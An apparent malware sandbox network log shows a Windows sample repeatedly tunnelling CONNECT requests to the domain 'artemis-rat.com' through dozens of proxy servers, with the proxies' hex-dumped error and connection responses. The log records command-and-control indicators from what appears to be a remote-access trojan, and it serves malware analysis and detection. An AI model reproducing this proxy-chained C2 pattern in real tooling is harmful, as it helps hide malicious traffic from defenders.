                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.994223118 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              684192.168.2.452303104.16.221.57807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.840923071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.995393991 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              685192.168.2.450373192.252.208.67142877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.840925932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              686192.168.2.4521018.213.128.908087284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.841391087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.538044930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.870908976 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              687192.168.2.452315104.19.83.128807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.842752934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.997345924 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              688192.168.2.452318104.17.50.45807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.843070984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.997494936 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              689192.168.2.45217593.190.142.57418907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.843159914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.140975952 CET226INHTTP/1.1 403 Forbidden
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Length: 101
                                              Content-Type: text/plain; charset=utf-8
                                              Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                              Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              690192.168.2.452169147.75.34.85100077284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.845572948 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:20.151062965 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              691192.168.2.452331104.24.35.152807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.846079111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.000293016 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              692192.168.2.452336104.16.105.182807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.848485947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.003002882 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              693192.168.2.451983103.163.51.254807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.851293087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              694192.168.2.45196746.161.196.22280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.852740049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.663163900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.867038012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.183626890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.795555115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              695192.168.2.452351104.25.58.39807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.854187965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.008136988 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              696192.168.2.452112190.103.177.131807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.854387045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.231597900 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              697192.168.2.452224172.67.231.3807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.862740993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.016794920 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              698192.168.2.45200643.231.22.229807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.864849091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              699192.168.2.452137216.9.224.113807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.865912914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              700192.168.2.452117103.133.25.1881817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.870071888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.663175106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.757427931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.351953983 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              701192.168.2.45225138.162.23.11931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.870131016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.294787884 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              702192.168.2.452160178.128.49.205807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.877548933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.283103943 CET1286INHTTP/1.1 400 Bad Request
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html
                                              Data Raw: 31 30 32 39 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 4e 45 2c 4e 4f 41 52 43 48 49 56 45 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 69 73 61 6c 6c 6f 77 65 64 48 6f 73 74 20 61 74 20 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 3a 73 6d 61 6c 6c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 20 20 20 20 62 6f 64 79 3e 64 69 76 20 7b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 20 7d 0a 20 20 20 20 68 31 20 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 20 7d 0a 20 20 20 20 68 32 20 7b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 38 65 6d 3b 20 7d 0a 20 20 20 20 68 32 20 73 70 61 6e 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 25 3b 20 63 6f 6c 6f 72 3a 23 36 36 36 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 20 7d 0a 20 20 20 20 68 33 20 7b 20 6d 61 72 67 69 6e 3a 31 65 6d 20 30 20 2e 35 65 6d 20 30 3b 20 7d 0a 20 20 20 20 68 34 20 7b 20 6d 61 72 67 69 6e 3a 30 20 30 20 2e 35 65 6d 20 30 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 7d 0a 20 20 20 20 63 6f 64 65 2c 20 70 72 65 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 20 7d 0a 20 20 20 20 74 61 62 6c 65 20 7b 20 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 20 63 6f 6c 6c 61 70 73 65 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 20 7d 0a 20 20 20 20 74 62 6f 64 79 20 74 64 2c 20 74 62 6f 64 79 20 74 68 20 7b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 20 70 61 64 64 69 6e 67 3a 32 70 78 20 33 70 78 3b 20 7d 0a 20 20 20 20 74 68 65 61 64 20 74 68 20 7b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 36 70 78 20 31 